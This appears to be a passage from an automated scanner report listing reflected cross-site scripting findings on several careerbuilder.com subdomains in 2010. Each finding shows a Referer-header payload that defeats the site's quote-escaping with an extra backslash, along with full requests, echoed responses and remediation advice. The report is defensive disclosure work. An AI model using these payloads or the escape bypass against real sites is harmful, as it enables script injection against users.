<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 80589\\';alert(1)//7e390f9d8e4'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a8cd\'%3balert(1)//b7f3cbea5f9 was submitted in the Referer HTTP header. This input was echoed as 5a8cd\\';alert(1)//b7f3cbea5f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Reporting.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=5a8cd\'%3balert(1)//b7f3cbea5f9
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174706
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_reporting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR6
Date: Sun, 14 Nov 2010 23:27:17 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 5a8cd\\';alert(1)//b7f3cbea5f9'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d838\'%3balert(1)//ec2babe9869 was submitted in the Referer HTTP header. This input was echoed as 1d838\\';alert(1)//ec2babe9869 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Reporting.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=1d838\'%3balert(1)//ec2babe9869
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174828
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_reporting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL33
Date: Sun, 14 Nov 2010 23:21:40 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 1d838\\';alert(1)//ec2babe9869'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77750\'%3balert(1)//879e9ac1947 was submitted in the Referer HTTP header. This input was echoed as 77750\\';alert(1)//879e9ac1947 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_TaxAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=77750\'%3balert(1)//879e9ac1947
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174993
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_taxaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR29
Date: Sun, 14 Nov 2010 23:29:09 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 77750\\';alert(1)//879e9ac1947'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50124\'%3balert(1)//0accddd36a4 was submitted in the Referer HTTP header. This input was echoed as 50124\\';alert(1)//0accddd36a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_TaxAccounting.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=50124\'%3balert(1)//0accddd36a4
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174984
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_taxaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL33
Date: Sun, 14 Nov 2010 23:22:24 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 50124\\';alert(1)//0accddd36a4'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45b43\'%3balert(1)//95a70c346c was submitted in the Referer HTTP header. This input was echoed as 45b43\\';alert(1)//95a70c346c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ac.ic/Florida_Miami/ HTTP/1.1
Host: admin-clerical.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=45b43\'%3balert(1)//95a70c346c
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 182073
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=22764023ee034704bda5975aaa089352-343070667-RL-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650BF7DA71D67AF1CE5740F446FBFE0297659B2CAB9F3201DD65D60982B44534385A36E6117DAB244D2; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:24:27 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:39:27 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL21
Date: Sun, 14 Nov 2010 22:24:26 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 45b43\\';alert(1)//95a70c346c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15d13\'%3balert(1)//fe56b96080b was submitted in the Referer HTTP header. This input was echoed as 15d13\\';alert(1)//fe56b96080b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ac.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh030 HTTP/1.1
Host: admin-clerical.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=15d13\'%3balert(1)//fe56b96080b
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 182180
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=dfa4109b3c3d40deaf61fe4e74f21e70-343070817-RS-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650C1115A68087250A1D365AC8E36853AEF9FBAE5174D13819F988A20C05E8A930A791A0ECD58470E83; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:26:56 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:41:56 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL28
Date: Sun, 14 Nov 2010 22:26:56 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 15d13\\';alert(1)//fe56b96080b'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed325\'%3balert(1)//a2006f10fc was submitted in the Referer HTTP header. This input was echoed as ed325\\';alert(1)//a2006f10fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1
Host: api.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ed325\'%3balert(1)//a2006f10fc
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9455
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=e3f8d780150c42bdaf0099872eed4f67-343074381-wg-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650F86A26BBE4AD890075BCE825E8CBFE9A17D384E5A683FA7DD6931DBD9BFFFCAAB287C9F0EC9DE396; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:26:21 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR17
Date: Sun, 14 Nov 2010 23:26:21 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Find J ...[SNIP]... s_cb.server='api'; s_cb.eVar8='api.careerbuilder.com/api/info.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - ed325\\';alert(1)//a2006f10fc'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7876\'%3balert(1)//2a4ac647379 was submitted in the Referer HTTP header. This input was echoed as f7876\\';alert(1)//2a4ac647379 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /bf.ic/Florida_Miami/ HTTP/1.1
Host: banking-finance.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f7876\'%3balert(1)//2a4ac647379
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 179080
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=98667f98e5c7489a86d60306e6aa7986-343070679-R8-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650DA3FD652AE407CF8145D6807B8F000BC9B21F4E0713C9D1D3275F93A7C063DD1AB9BD0B0FCDB558C; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:24:39 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:39:39 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL8
Date: Sun, 14 Nov 2010 22:24:39 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - f7876\\';alert(1)//2a4ac647379'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0688\'%3balert(1)//669e64fff42 was submitted in the Referer HTTP header. This input was echoed as c0688\\';alert(1)//669e64fff42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /bf.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh032 HTTP/1.1
Host: banking-finance.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c0688\'%3balert(1)//669e64fff42
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 179397
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=01dad8ee4ec949139c37815160da596c-343070822-R3-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65041B0164C5C0918E352507EB545CE2531FD805E6455470126ADEEDECE63BA37E763FDE2727F5FA09A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:02 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:02 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL3
Date: Sun, 14 Nov 2010 22:27:01 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - c0688\\';alert(1)//669e64fff42'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9dc0a\'%3balert(1)//a91ce667363 was submitted in the Referer HTTP header. This input was echoed as 9dc0a\\';alert(1)//a91ce667363 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
